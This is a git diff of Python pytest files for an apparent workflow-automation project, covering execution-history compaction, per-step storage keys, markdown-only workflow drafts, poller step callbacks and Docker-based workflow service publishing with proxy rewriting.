     monkeypatch.setattr(updater, "_write_version_marker", lambda _v: None)
     monkeypatch.setattr(updater, "_refresh_global_cli_entry", lambda _root: None)
     monkeypatch.setattr(updater, "_build_restart_argv", lambda install_root=None: [r"C:\tool\python.exe", "-m", "flocks.cli.main"])
-    monkeypatch.setattr(updater, "_validate_windows_restart_runtime", fake_validate)
     monkeypatch.setattr(updater, "_prepare_upgrade_handover", lambda _version: events.append("handover"))
     monkeypatch.setattr(updater, "rollback_upgrade_handover", lambda: events.append("rollback_handover"))
     monkeypatch.setattr(
diff --git a/tests/user_defined_pages/test_api_runtime.py b/tests/user_defined_pages/test_api_runtime.py
index 2b5c9beb6..d08462cc4 100644
--- a/tests/user_defined_pages/test_api_runtime.py
+++ b/tests/user_defined_pages/test_api_runtime.py
@@ -156,6 +156,35 @@ async def _dispatch(page_id: str, api_path: str, request: Request):
         assert resp.status_code == 413
 
 
+@pytest.mark.asyncio
+async def test_api_runtime_treats_client_disconnect_as_closed_request(runtime_store: UserDefinedPagesStore):  # dispatch on a disconnected request is expected to return status 499
+    runtime = UserDefinedPageApiRuntime(runtime_store)
+
+    async def receive():  # every receive() call yields an "http.disconnect" message
+        return {"type": "http.disconnect"}
+
+    request = Request(  # hand-built scope dict for a POST with no headers and no query string
+        {
+            "type": "http",
+            "asgi": {"version": "3.0"},
+            "http_version": "1.1",
+            "method": "POST",
+            "scheme": "http",
+            "path": "/api/user-defined-pages/runtime-page/api/echo",
+            "raw_path": b"/api/user-defined-pages/runtime-page/api/echo",
+            "query_string": b"",
+            "headers": [],
+            "client": ("127.0.0.1", 12345),
+            "server": ("testserver", 80),
+        },
+        receive,
+    )
+
+    response = await runtime.dispatch("runtime-page", "echo", request, {"role": "admin"})
+
+    assert response.status_code == 499  # a response object is returned rather than an exception propagating
+
+
 @pytest.mark.asyncio
 async def test_api_runtime_blocks_non_local_imports(runtime_store: UserDefinedPagesStore, runtime_app: FastAPI):
     runtime_store.save_source_file(
diff --git a/tests/workflow/test_execution_store_compact.py b/tests/workflow/test_execution_store_compact.py
index 13c8b13f8..1707280de 100644
--- a/tests/workflow/test_execution_store_compact.py
+++ b/tests/workflow/test_execution_store_compact.py
@@ -17,6 +17,7 @@
 
 from __future__ import annotations
 
+import json
 from typing import Any, Dict, List
 from unittest.mock import AsyncMock, patch
 
@@ -26,8 +27,11 @@
     DEFAULT_LARGE_LIST_KEYS,
     _trim_execution_history,
     compact_history_for_storage,
+    compact_execution_summary,
     compact_outputs_for_storage,
     compact_step_for_storage,
+    record_execution_result,
+    workflow_execution_step_key,
 )
 from flocks.storage.storage import Storage
 
@@ -232,6 +236,79 @@ def test_compact_history_skips_step_with_non_dict_outputs() -> None:
     assert compacted[0]["outputs"] == "string-output"
 
 
+def test_compact_step_accepts_pydantic_like_model_dump() -> None:  # compact_step_for_storage should accept an object exposing model_dump(), not only a dict
+    class StepLike:  # minimal stand-in: its only member is model_dump
+        def model_dump(self, mode: str = "python") -> Dict[str, Any]:
+            assert mode == "json"  # fails the test unless the caller passes mode="json"
+            return {
+                "node_id": "step-1",
+                "outputs": {"raw_alerts": _make_alerts(150)},
+            }
+
+    compacted = compact_step_for_storage(StepLike())
+
+    assert compacted["node_id"] == "step-1"
+    assert compacted["outputs"] == {"_raw_alerts_count": 150}  # outputs expected to hold only a _raw_alerts_count entry
+
+
+def test_compact_execution_summary_drops_execution_log() -> None:  # the summary empties executionLog but keeps stepCount
+    exec_data = {
+        "id": "exec-1",
+        "workflowId": "wf",
+        "executionLog": [{"node_id": "a"}],
+        "stepCount": 1,
+    }
+
+    summary = compact_execution_summary(exec_data)
+
+    assert summary["executionLog"] == []  # key stays present, with an empty list
+    assert summary["stepCount"] == 1
+    assert exec_data["executionLog"] == [{"node_id": "a"}]  # the input dict must not be mutated
+
+
+def test_workflow_execution_step_key_is_append_only_namespaced() -> None:  # pins the storage key layout for a single step
+    assert (
+        workflow_execution_step_key("exec-1", 12)
+        == "workflow_execution_step/exec-1/00000012"  # prefix / execution id / index zero-padded to 8 digits
+    )
+
+
+@pytest.mark.asyncio
+async def test_record_execution_result_backfills_execution_log_steps() -> None:  # executionLog entries are written as per-step records before the summary
+    storage_write = AsyncMock(return_value=None)  # replaces Storage.write; its await_args_list is inspected below
+    update_stats = AsyncMock(return_value=None)
+    exec_data = {
+        "id": "exec-1",
+        "workflowId": "wf",
+        "status": "success",
+        "duration": 1.0,
+        "executionLog": [
+            {"node_id": "step-1", "outputs": {"raw_alerts": _make_alerts(150)}},
+            {"node_id": "step-2", "inputs": {"filtered_alerts": _make_alerts(150)}},
+        ],
+    }
+
+    def raise_create_task(coro, *args, **kwargs):  # noqa: ANN001, ARG001
+        coro.close()  # close the passed coroutine before raising; presumably avoids a never-awaited warning
+        raise RuntimeError  # the patched asyncio.create_task always fails
+
+    with patch.object(Storage, "write", storage_write), \
+         patch("flocks.workflow.execution_store._update_workflow_stats", update_stats), \
+         patch("flocks.session.recorder.Recorder.record_workflow_execution", AsyncMock(return_value=None)), \
+         patch("flocks.workflow.execution_store.asyncio.create_task", side_effect=raise_create_task), \
+         patch("flocks.workflow.execution_store._trim_execution_history", AsyncMock(return_value=None)):
+        await record_execution_result("wf", "exec-1", exec_data)
+
+    write_calls = storage_write.await_args_list
+    assert write_calls[0].args[0] == "workflow_execution_step/exec-1/00000001"  # first write: step 1 under its own key
+    assert write_calls[0].args[1]["outputs"] == {"_raw_alerts_count": 150}
+    assert write_calls[1].args[0] == "workflow_execution_step/exec-1/00000002"  # second write: step 2
+    assert write_calls[1].args[1]["inputs"] == {"_filtered_alerts_count": 150}
+    assert write_calls[2].args[0] == "workflow_execution/exec-1"  # third write: the execution record itself
+    assert write_calls[2].args[1]["executionLog"] == []
+    assert write_calls[2].args[1]["stepCount"] == 2  # matches the two executionLog entries supplied above
+
+
 def test_compact_history_compacts_each_step_inputs() -> None:
     big = _make_alerts(5_000)
     history = [
@@ -345,7 +422,14 @@ async def test_trim_execution_history_keeps_only_30_and_deletes_matching_jsonl(
     other_record.write_text('{"type":"workflow.summary"}\n', encoding="utf-8")
 
     remove_mock = AsyncMock(return_value=None)
-    with patch.object(Storage, "list_entries", AsyncMock(return_value=entries)), \
+    raw_entries = [(key, json.dumps(value)) for key, value in entries]
+
+    async def list_raw_side_effect(prefix: str):
+        if prefix == "workflow_execution/":
+            return raw_entries
+        return []
+
+    with patch.object(Storage, "list_raw", AsyncMock(side_effect=list_raw_side_effect)), \
          patch.object(Storage, "remove", remove_mock), \
          patch("flocks.session.recorder._record_dir", return_value=tmp_path):
         await _trim_execution_history(workflow_id)
diff --git a/tests/workflow/test_fs_store.py b/tests/workflow/test_fs_store.py
index 80994b141..711f072ee 100644
--- a/tests/workflow/test_fs_store.py
+++ b/tests/workflow/test_fs_store.py
@@ -89,3 +89,105 @@ def test_read_workflow_dir_uses_latest_file_mtime_when_meta_is_stale(
     assert data is not None
     assert data["updatedAt"] == 9000
     assert data["markdownContent"] == "# demo\n"
+    assert data["editMarkdownContent"] == "# demo\n"
+
+
+def test_read_workflow_dir_uses_legacy_edit_markdown_only_as_fallback(  # workflow.edit.md content is expected in both markdown fields
+    tmp_path: Path,
+):
+    workspace = tmp_path / "workspace"
+    workflow_id = "legacy-edit-md-demo"
+    _write_workflow(workspace, workflow_id, "legacy-demo")  # helper defined elsewhere in this test module
+    workflow_dir = workspace / ".flocks" / "plugins" / "workflows" / workflow_id
+
+    (workflow_dir / "workflow.edit.md").write_text("# legacy\n", encoding="utf-8")  # the file the test name calls legacy
+
+    data = fs_store.read_workflow_dir(workflow_dir, workflow_id, "project")
+
+    assert data is not None
+    assert data["markdownContent"] == "# legacy\n"
+    assert data["editMarkdownContent"] == "# legacy\n"
+
+
+def test_read_workflow_dir_supports_markdown_only_draft(  # a directory holding only workflow.md is expected to load as a draft
+    tmp_path: Path,
+):
+    workflow_id = "domain_intel_query"
+    workflow_dir = tmp_path / "workflows" / workflow_id
+    workflow_dir.mkdir(parents=True, exist_ok=True)
+    (workflow_dir / "workflow.md").write_text(  # the only file this test creates in the directory
+        "# Domain Intel Query\n\n## Purpose\n\nDraft spec only.\n",
+        encoding="utf-8",
+    )
+
+    data = fs_store.read_workflow_dir(workflow_dir, workflow_id, "global")
+
+    assert data is not None
+    assert data["id"] == workflow_id
+    assert data["name"] == "Domain Intel Query"  # equals the text of the markdown's first heading
+    assert data["status"] == "draft"
+    assert data["source"] == "global"  # equals the third argument passed to read_workflow_dir
+    assert data["workflowJson"] == {"start": "", "nodes": [], "edges": []}  # empty graph
+    assert data["markdownContent"].startswith("# Domain Intel Query")
+    assert data["editMarkdownContent"] == data["markdownContent"]
+
+
+def test_read_workflow_from_fs_discovers_markdown_only_draft(  # lookup by id alone should find a workflow that has only workflow.md
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+):
+    workspace = tmp_path / "workspace"
+    workflow_id = "markdown-only-demo"
+    workflow_dir = workspace / ".flocks" / "plugins" / "workflows" / workflow_id
+    workflow_dir.mkdir(parents=True, exist_ok=True)
+    (workflow_dir / "workflow.md").write_text("# Markdown Only Demo\n", encoding="utf-8")
+
+    monkeypatch.chdir(workspace)  # only the id is passed below; presumably the lookup is relative to the cwd
+
+    data = fs_store.read_workflow_from_fs(workflow_id)
+
+    assert data is not None
+    assert data["id"] == workflow_id
+    assert data["name"] == "Markdown Only Demo"  # equals the text of the markdown's heading
+    assert data["workflowJson"]["nodes"] == []
+
+
+def test_resolve_workflow_id_from_markdown_path(  # a path to workflow.md should resolve to its parent directory's workflow id
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+):
+    workspace = tmp_path / "workspace"
+    workflow_id = "markdown-path-demo"
+    workflow_dir = workspace / ".flocks" / "plugins" / "workflows" / workflow_id
+    workflow_dir.mkdir(parents=True, exist_ok=True)
+    md_file = workflow_dir / "workflow.md"
+    md_file.write_text("# Markdown Path Demo\n", encoding="utf-8")
+
+    monkeypatch.chdir(workspace)  # run from the workspace root; presumably needed for workflow discovery
+
+    assert fs_store.resolve_workflow_id_from_source(str(md_file)) == workflow_id  # the path is passed as a str
+
+
+def test_read_workflow_dir_exposes_localized_names_from_metadata(  # metadata.nameI18n in workflow.json should surface as top-level nameI18n
+    tmp_path: Path,
+):
+    workspace = tmp_path / "workspace"
+    workflow_id = "localized-name-demo"
+    _write_workflow(workspace, workflow_id, "Localized Name Demo")  # helper defined elsewhere in this test module
+    workflow_dir = workspace / ".flocks" / "plugins" / "workflows" / workflow_id
+    workflow_json = json.loads((workflow_dir / "workflow.json").read_text(encoding="utf-8"))
+    workflow_json["metadata"] = {  # replace the metadata of the workflow.json just read
+        "nameI18n": {
+            "zh-CN": "本地化名称演示",
+            "en-US": "Localized Name Demo",
+        }
+    }
+    (workflow_dir / "workflow.json").write_text(json.dumps(workflow_json), encoding="utf-8")  # write the modified JSON back
+
+    data = fs_store.read_workflow_dir(workflow_dir, workflow_id, "project")
+
+    assert data is not None
+    assert data["nameI18n"] == {  # same mapping as stored under metadata above
+        "zh-CN": "本地化名称演示",
+        "en-US": "Localized Name Demo",
+    }
diff --git a/tests/workflow/test_logging_config.py b/tests/workflow/test_logging_config.py
index ed9a5878c..8cb6ed814 100644
--- a/tests/workflow/test_logging_config.py
+++ b/tests/workflow/test_logging_config.py
@@ -46,5 +46,7 @@ def test_run_workflow_default_logging_suppresses_routine_execution_noise() -> No
         logs = stream.getvalue()
         assert "开始执行 workflow" not in logs
         assert "workflow 信息" not in logs
+        assert "outputs=" not in logs
+        assert "outputs_keys=['ok']" in logs
     finally:
         logger.handlers.clear()
diff --git a/tests/workflow/test_poller_manager.py b/tests/workflow/test_poller_manager.py
index 82fcb86ea..63534e535 100644
--- a/tests/workflow/test_poller_manager.py
+++ b/tests/workflow/test_poller_manager.py
@@ -2,11 +2,13 @@
 
 import asyncio
 import threading
+from types import SimpleNamespace
 from typing import Any
 
 import pytest
 
 from flocks.workflow import poller_manager
+from flocks.workflow import execution_store
 from flocks.workflow.runner import RunWorkflowResult
 
 
@@ -51,7 +53,15 @@ async def _fake_read(_key: str) -> dict[str, Any]:
             "inputs": {"dedup_source_workflow_name": "stream_alert_denoise_gt_fast"},
         }
 
-    def _fake_run_workflow(*, workflow: Any, inputs: dict[str, Any], timeout_s: int, trace: bool, cancel):  # noqa: ANN001
+    def _fake_run_workflow(  # noqa: ANN001
+        *,
+        workflow: Any,
+        inputs: dict[str, Any],
+        timeout_s: int,
+        trace: bool,
+        cancel,
+        on_step_complete,
+    ):
         captured_inputs.update(inputs)
         assert workflow == {"start": "n1", "nodes": [], "edges": []}
         assert timeout_s == 9
@@ -115,6 +125,7 @@ async def test_run_once_records_execution_and_normalizes_business_failure(
     manager = poller_manager.WorkflowPollerManager()
     created_records: list[dict[str, Any]] = []
     recorded_results: list[dict[str, Any]] = []
+    recorded_steps: list[tuple[str, int, dict[str, Any]]] = []
 
     async def _fake_read(_key: str) -> dict[str, Any]:
         return {
@@ -150,12 +161,38 @@ async def _fake_record_execution_result(
         _ = workflow_id, exec_id
         recorded_results.append(dict(exec_data))
 
-    def _fake_run_workflow(*, workflow: Any, inputs: dict[str, Any], timeout_s: int, trace: bool, cancel):  # noqa: ANN001
+    async def _fake_record_execution_step(
+        exec_id: str,
+        step_index: int,
+        step: dict[str, Any],
+    ) -> dict[str, Any]:
+        recorded_steps.append((exec_id, step_index, step))
+        return step
+
+    def _fake_run_workflow(  # noqa: ANN001
+        *,
+        workflow: Any,
+        inputs: dict[str, Any],
+        timeout_s: int,
+        trace: bool,
+        cancel,
+        on_step_complete,
+    ):
         assert workflow == {"start": "n1", "nodes": [], "edges": []}
         assert timeout_s == 9
         assert trace is False
         assert cancel() is False
         assert inputs["dedup_source_workflow_name"] == "stream_alert_denoise_gt_fast"
+        on_step_complete(
+            SimpleNamespace(
+                model_dump=lambda mode="json": {
+                    "node_id": "load",
+                    "node_type": "python",
+                    "inputs": {"iteration": 1, "total_iterations": 2},
+                    "outputs": {"load_stats": {"record_count": 9}},
+                }
+            )
+        )
         return RunWorkflowResult(
             status="SUCCEEDED",
             run_id="run-1",
@@ -176,6 +213,7 @@ def _fake_run_workflow(*, workflow: Any, inputs: dict[str, Any], timeout_s: int,
     )
     monkeypatch.setattr(poller_manager, "create_execution_record", _fake_create_execution_record)
     monkeypatch.setattr(poller_manager, "record_execution_result", _fake_record_execution_result)
+    monkeypatch.setattr(execution_store, "record_execution_step", _fake_record_execution_step)
     monkeypatch.setattr(poller_manager, "run_workflow", _fake_run_workflow)
 
     status = await manager.run_once("wf-business-failure")
@@ -185,6 +223,12 @@ def _fake_run_workflow(*, workflow: Any, inputs: dict[str, Any], timeout_s: int,
     assert recorded_results[0]["status"] == "error"
     assert recorded_results[0]["errorMessage"] == "business rule blocked"
     assert recorded_results[0]["currentPhase"] == "error"
+    assert recorded_results[0]["executionLog"] == []
+    assert recorded_results[0]["stepCount"] == 1
+    assert recorded_results[0]["loopProgress"]["total_iterations"] == 2
+    assert recorded_steps[0][0] == "exec-1"
+    assert recorded_steps[0][1] == 1
+    assert recorded_steps[0][2]["node_id"] == "load"
     assert status["lastStatus"] == "error"
     assert status["lastError"] == "business rule blocked"
     assert status["selectedCount"] == 9
@@ -205,8 +249,17 @@ async def test_no_overlap_skips_when_previous_run_is_still_active(
         "inputs": {},
     }
 
-    def _fake_run_workflow(*, workflow: Any, inputs: dict[str, Any], timeout_s: int, trace: bool, cancel):  # noqa: ANN001
+    def _fake_run_workflow(  # noqa: ANN001
+        *,
+        workflow: Any,
+        inputs: dict[str, Any],
+        timeout_s: int,
+        trace: bool,
+        cancel,
+        on_step_complete,
+    ):
         _ = workflow, inputs, timeout_s, trace, cancel
+        _ = on_step_complete
         # Keep the run active until the test releases it so a second tick skips.
         asyncio.run(asyncio.wait_for(threading_event.wait(), timeout=2.0))
         return RunWorkflowResult(status="success", outputs={"load_stats": {"record_count": 1}})
@@ -280,8 +333,17 @@ async def _fake_record_execution_result(
     ) -> None:
         _ = workflow_id, exec_id, exec_data
 
-    def _fake_run_workflow(*, workflow: Any, inputs: dict[str, Any], timeout_s: int, trace: bool, cancel):  # noqa: ANN001
+    def _fake_run_workflow(  # noqa: ANN001
+        *,
+        workflow: Any,
+        inputs: dict[str, Any],
+        timeout_s: int,
+        trace: bool,
+        cancel,
+        on_step_complete,
+    ):
         _ = workflow, inputs, timeout_s, trace, cancel
+        _ = on_step_complete
         release_run.wait(timeout=0.2)
         return RunWorkflowResult(status="SUCCEEDED", run_id="run-stop")
 
diff --git a/tests/workflow/test_run_workflow_history.py b/tests/workflow/test_run_workflow_history.py
index 2caa1b25d..9bd6d3f40 100644
--- a/tests/workflow/test_run_workflow_history.py
+++ b/tests/workflow/test_run_workflow_history.py
@@ -1,4 +1,4 @@
-"""Test run_workflow tool keeps execution history in metadata."""
+"""Test run_workflow tool keeps final metadata lightweight."""
 
 import json
 import pytest
@@ -17,7 +17,7 @@ def __init__(self) -> None:
 
 @pytest.mark.asyncio
 async def test_workflow_history_in_output():
-    """History stays in metadata while the default output stays concise."""
+    """Final tool metadata omits retained history while output stays concise."""
     
     # Create a simple test workflow
     workflow = {
@@ -65,35 +65,10 @@ async def test_workflow_history_in_output():
     assert result.success is True
     assert result.output is not None
     
-    # Verify metadata contains history
+    # Final tool metadata should not retain full per-step history in memory.
     assert "history" in result.metadata
     history = result.metadata["history"]
-    
-    # Should have 3 steps
-    assert len(history) == 3
-    
-    # Verify step 1
-    step1 = history[0]
-    assert step1["node_id"] == "step1"
-    assert "inputs" in step1
-    assert step1["inputs"]["x"] == 5
-    assert "outputs" in step1
-    assert step1["outputs"]["result1"] == 15
-    assert step1.get("error") is None
-    
-    # Verify step 2
-    step2 = history[1]
-    assert step2["node_id"] == "step2"
-    assert step2["inputs"]["result1"] == 15
-    assert step2["outputs"]["result2"] == 30
-    assert step2.get("error") is None
-    
-    # Verify step 3
-    step3 = history[2]
-    assert step3["node_id"] == "step3"
-    assert step3["inputs"]["result2"] == 30
-    assert step3["outputs"]["final"] == 35
-    assert step3.get("error") is None
+    assert history == []
     
     # Verify final outputs in metadata
     assert "outputs" in result.metadata
@@ -109,7 +84,7 @@ async def test_workflow_history_in_output():
 
 @pytest.mark.asyncio
 async def test_workflow_history_with_error():
-    """History is preserved in metadata even when execution fails."""
+    """Failure metadata remains lightweight even when execution fails."""
     
     workflow = {
         "name": "test_error_workflow",
@@ -146,25 +121,11 @@ async def test_workflow_history_with_error():
     assert result.success is False
     assert result.error is not None
     
-    # But history should still be available
+    # Per-step details are written through execution step rows, not retained
+    # in the final ToolResult metadata.
     assert "history" in result.metadata
     history = result.metadata["history"]
-    
-    # Should have 2 steps (both executed, second one failed)
-    assert len(history) == 2
-    
-    # First step should succeed
-    step1 = history[0]
-    assert step1["node_id"] == "step1"
-    assert step1["outputs"]["value"] == 100
-    assert step1.get("error") is None
-    
-    # Second step should have error
-    step2 = history[1]
-    assert step2["node_id"] == "step2"
-    assert step2.get("error") is not None
-    assert "Intentional error" in step2["error"]
-    assert "traceback" in step2
+    assert history == []
     
     # Output should contain only the top-level failure summary
     assert "Error:" in result.output
@@ -175,7 +136,7 @@ async def test_workflow_history_with_error():
 
 @pytest.mark.asyncio
 async def test_workflow_history_with_stdout():
-    """Stdout remains in metadata history even if hidden from tool output."""
+    """Stdout is not retained in final metadata history or tool output."""
     
     workflow = {
         "name": "test_stdout_workflow",
@@ -202,13 +163,8 @@ async def test_workflow_history_with_stdout():
     
     assert result.success is True
     
-    # Check history contains stdout
     history = result.metadata["history"]
-    assert len(history) == 1
-    
-    step1 = history[0]
-    assert "stdout" in step1
-    assert "Hello from step1" in step1["stdout"]
+    assert history == []
     
     # Output should stay concise and omit per-step stdout details
     assert "Stdout:" not in result.output
diff --git a/tests/workflow/test_tool_run_workflow.py b/tests/workflow/test_tool_run_workflow.py
index afd0fa491..7edfd9437 100644
--- a/tests/workflow/test_tool_run_workflow.py
+++ b/tests/workflow/test_tool_run_workflow.py
@@ -377,14 +377,7 @@ def run_side_effect(**kwargs):
                 steps=1,
                 last_node_id="node-1",
                 outputs={"enriched_alerts": large_alerts, "message": "done"},
-                history=[
-                    {
-                        "node_id": "node-1",
-                        "node_type": "python",
-                        "inputs": {"raw_alerts": large_alerts, "source": "syslog"},
-                        "outputs": {"raw_alerts": large_alerts, "message": "ok"},
-                    }
-                ],
+                history=[],
                 error=None,
             )
 
@@ -423,12 +416,14 @@ def run_side_effect(**kwargs):
             )
 
         assert result.success is True
-        progress_payload = storage_write.await_args_list[-1].args[1]
-        assert progress_payload["executionLog"][0]["inputs"] == {
+        step_write = storage_write.await_args_list[-1]
+        assert step_write.args[0] == "workflow_execution_step/exec-compacted/00000001"
+        step_payload = step_write.args[1]
+        assert step_payload["inputs"] == {
             "_raw_alerts_count": 150,
             "source": "syslog",
         }
-        assert progress_payload["executionLog"][0]["outputs"] == {
+        assert step_payload["outputs"] == {
             "_raw_alerts_count": 150,
             "message": "ok",
         }
@@ -436,28 +431,16 @@ def run_side_effect(**kwargs):
             "_enriched_alerts_count": 150,
             "message": "done",
         }
-        assert result.metadata["history"][0]["inputs"] == {
-            "_raw_alerts_count": 150,
-            "source": "syslog",
-        }
-        assert result.metadata["history"][0]["outputs"] == {
-            "_raw_alerts_count": 150,
-            "message": "ok",
-        }
+        assert result.metadata["history"] == []
+        assert result.metadata["history_count"] == 0
 
         final_exec_data = record_result.await_args.args[2]
         assert final_exec_data["outputResults"] == {
             "_enriched_alerts_count": 150,
             "message": "done",
         }
-        assert final_exec_data["executionLog"][0]["inputs"] == {
-            "_raw_alerts_count": 150,
-            "source": "syslog",
-        }
-        assert final_exec_data["executionLog"][0]["outputs"] == {
-            "_raw_alerts_count": 150,
-            "message": "ok",
-        }
+        assert final_exec_data["executionLog"] == []
+        assert final_exec_data["stepCount"] == 1
         assert any(update.get("workflow_execution_id") == "exec-compacted" for update in metadata_updates)
 
     @pytest.mark.anyio
@@ -757,7 +740,8 @@ async def test_run_workflow_result_formatting(self, tool_context_with_permission
             assert "Last node: node-3" in output
             assert "Final Outputs:" in output
             assert "Execution History" not in output
-            assert result.metadata["history"] == fake.history
+        assert result.metadata["history"] == []
+        assert result.metadata["history_count"] == len(fake.history)
     
     @pytest.mark.anyio
     async def test_run_workflow_result_with_error(self, tool_context_with_permission, simple_workflow):
diff --git a/tests/workflow/test_workflow_cancellation.py b/tests/workflow/test_workflow_cancellation.py
index a7bfd5621..400ae3bb7 100644
--- a/tests/workflow/test_workflow_cancellation.py
+++ b/tests/workflow/test_workflow_cancellation.py
@@ -117,6 +117,7 @@ def on_step_complete(_step_result) -> None:
         trace=False,
         on_step_complete=on_step_complete,
         cancel=cancel_event.is_set,
+        retain_history=True,
     )
 
     assert result.status == "CANCELLED"
diff --git a/tests/workflow/test_workflow_center.py b/tests/workflow/test_workflow_center.py
index 1675bea7d..7aa12cc8e 100644
--- a/tests/workflow/test_workflow_center.py
+++ b/tests/workflow/test_workflow_center.py
@@ -8,9 +8,55 @@
 import pytest
 
 from flocks.storage.storage import Storage
+from flocks.config.config import Config
 from flocks.workflow import center
 
 
+def test_docker_proxy_env_value_rewrites_loopback_proxy() -> None:
+    """Loopback proxies must point at the host from inside Docker containers."""
+    assert (
+        center._docker_proxy_env_value("http://127.0.0.1:7897")
+        == "http://host.docker.internal:7897"
+    )
+    assert (
+        center._docker_proxy_env_value("https://localhost:7897")
+        == "https://host.docker.internal:7897"
+    )
+    assert center._docker_proxy_env_value("http://proxy.example:8080") == "http://proxy.example:8080"
+
+
+@pytest.mark.asyncio
+async def test_wait_docker_service_healthy_fails_fast_when_container_exits(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    """A dead container should surface logs instead of waiting for health retries."""
+
+    def fake_json_get(*_args, **_kwargs):
+        raise OSError("connection refused")
+
+    async def fake_container_state(_container_name: str) -> dict[str, bool]:
+        return {"exists": True, "running": False}
+
+    async def fake_logs_tail(_container_name: str, *, lines: int = 80) -> str:
+        return "pip install failed"
+
+    async def fail_sleep(_interval: float) -> None:
+        raise AssertionError("health check should not sleep after container exit")
+
+    monkeypatch.setattr(center, "_json_get", fake_json_get)
+    monkeypatch.setattr(center, "docker_container_state", fake_container_state)
+    monkeypatch.setattr(center, "_docker_logs_tail", fake_logs_tail)
+    monkeypatch.setattr(center.asyncio, "sleep", fail_sleep)
+
+    with pytest.raises(center.WorkflowCenterError, match="pip install failed"):
+        await center._wait_docker_service_healthy(
+            "http://127.0.0.1:19000",
+            "flocks-wf-dead",
+            retries=10,
+            interval_s=2,
+        )
+
+
 def _workflow_payload(name: str) -> dict:
     return {
         "id": f"{name}-id",
@@ -44,6 +90,7 @@ async def test_scan_skill_workflows_is_idempotent(
     workflow_path = wf_dir / "workflow.json"
     workflow_path.write_text(json.dumps(_workflow_payload("demo")), encoding="utf-8")
     monkeypatch.chdir(tmp_path)
+    monkeypatch.setattr(center, "resolve_global_workflow_roots", lambda: [])
 
     first = await center.scan_skill_workflows()
     assert len(first) == 1
@@ -60,6 +107,37 @@ async def test_scan_skill_workflows_is_idempotent(
     assert third[0]["draftChanged"] is True
 
 
+@pytest.mark.asyncio
+async def test_scan_skill_workflows_skips_hidden_templates(
+    tmp_path: Path,
+    isolated_storage,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    """Hidden workflow templates should not enter prompt-visible registry entries."""
+    visible_dir = tmp_path / ".flocks" / "plugins" / "workflows" / "visible"
+    hidden_dir = tmp_path / ".flocks" / "plugins" / "workflows" / "__hidden_template"
+    visible_dir.mkdir(parents=True)
+    hidden_dir.mkdir(parents=True)
+    (visible_dir / "workflow.json").write_text(
+        json.dumps(_workflow_payload("visible")),
+        encoding="utf-8",
+    )
+    (hidden_dir / "workflow.json").write_text(
+        json.dumps(_workflow_payload("hidden-template")),
+        encoding="utf-8",
+    )
+    (hidden_dir / "meta.json").write_text(
+        json.dumps({"hidden": True, "templateOnly": True}),
+        encoding="utf-8",
+    )
+    monkeypatch.chdir(tmp_path)
+    monkeypatch.setattr(center, "resolve_global_workflow_roots", lambda: [])
+
+    scanned = await center.scan_skill_workflows(tmp_path)
+
+    assert [item["name"] for item in scanned] == ["visible"]
+
+
 @pytest.mark.asyncio
 async def test_publish_invoke_stop_workflow_service(
     tmp_path: Path,
@@ -74,33 +152,41 @@ async def test_publish_invoke_stop_workflow_service(
         encoding="utf-8",
     )
     monkeypatch.chdir(tmp_path)
+    monkeypatch.setattr(center, "resolve_global_workflow_roots", lambda: [])
+    monkeypatch.setenv("FLOCKS_DATA_DIR", str(tmp_path / "data"))
+    monkeypatch.setattr(Config, "_global_config", None)
     monkeypatch.setenv("FLOCKS_WORKFLOW_SERVICE_DRIVER", "docker")
+    monkeypatch.setenv("FLOCKS_WORKFLOW_SERVICE_PIP_INDEX_URL", "https://mirror.example/simple")
+    monkeypatch.setenv("HTTP_PROXY", "http://127.0.0.1:7897")
     scanned = await center.scan_skill_workflows()
     workflow_id = scanned[0]["workflowId"]
 
     docker_calls = []
+    json_post_calls = []
 
-    async def fake_exec_docker(args, allow_failure=False):
+    async def fake_exec_docker(args, allow_failure=False, **_kwargs):
         docker_calls.append((args, allow_failure))
         return ("container-abc\n", "", 0)
 
     async def fake_allocate_port() -> int:
         return 19123
 
-    async def fake_wait_service_healthy(*_args, **_kwargs) -> bool:
+    async def fake_wait_docker_service_healthy(*_args, **_kwargs) -> bool:
         return True
 
-    def fake_json_post(*_args, **_kwargs):
+    def fake_json_post(*args, **kwargs):
+        json_post_calls.append((args, kwargs))
         return {"status": "SUCCEEDED", "outputs": {"answer": 42}, "run_id": "run-1"}
 
     monkeypatch.setattr(center, "exec_docker", fake_exec_docker)
     monkeypatch.setattr(center, "_allocate_port", fake_allocate_port)
-    monkeypatch.setattr(center, "_wait_service_healthy", fake_wait_service_healthy)
+    monkeypatch.setattr(center, "_wait_docker_service_healthy", fake_wait_docker_service_healthy)
     monkeypatch.setattr(center, "_json_post", fake_json_post)
 
     published = await center.publish_workflow(workflow_id)
     assert published["status"] == "active"
     assert published["hostPort"] == 19123
+    assert len(published["apiKey"]) == 64
 
     invoked = await center.invoke_published_workflow(workflow_id, inputs={"k": "v"})
     assert invoked["status"] == "SUCCEEDED"
@@ -113,8 +199,27 @@ def fake_json_post(*_args, **_kwargs):
 
     assert any(call[0][:3] == ["run", "-d", "--name"] for call in docker_calls)
     run_call = next(call for call in docker_calls if call[0][:3] == ["run", "-d", "--name"])
-    assert "pip install --no-cache-dir /app" in " ".join(run_call[0])
+    run_args = " ".join(run_call[0])
+    assert "python -m pip install uv" in run_args
+    assert (
+        "uv pip install --system -r /runtime/requirements.txt" in run_args
+        or "uv pip install --system /app" in run_args
+    )
     assert "/runtime" in run_call[0]
     assert "-w" in run_call[0]
     assert "/runtime" in run_call[0][run_call[0].index("-w") + 1]
+    assert "-e" in run_call[0]
+    assert any(arg.endswith(":/root/.cache/pip") for arg in run_call[0])
+    assert any(arg.endswith(":/root/.cache/uv") for arg in run_call[0])
+    assert "UV_CACHE_DIR=/root/.cache/uv" in run_call[0]
+    assert f"FLOCKS_WORKFLOW_SERVICE_API_KEY={published['apiKey']}" in run_call[0]
+    assert "PIP_INDEX_URL=https://mirror.example/simple" in run_call[0]
+    assert "UV_DEFAULT_INDEX=https://mirror.example/simple" in run_call[0]
+    assert "HTTP_PROXY=http://host.docker.internal:7897" in run_call[0]
+    assert "HTTP_PROXY=http://127.0.0.1:7897" not in run_call[0]
+    assert "--add-host" in run_call[0]
+    assert "host.docker.internal:host-gateway" in run_call[0]
+    assert json_post_calls
+    assert json_post_calls[0][0][0] == "http://127.0.0.1:19123/invoke"
+    assert json_post_calls[0][0][3] == {"x-api-key": published["apiKey"]}
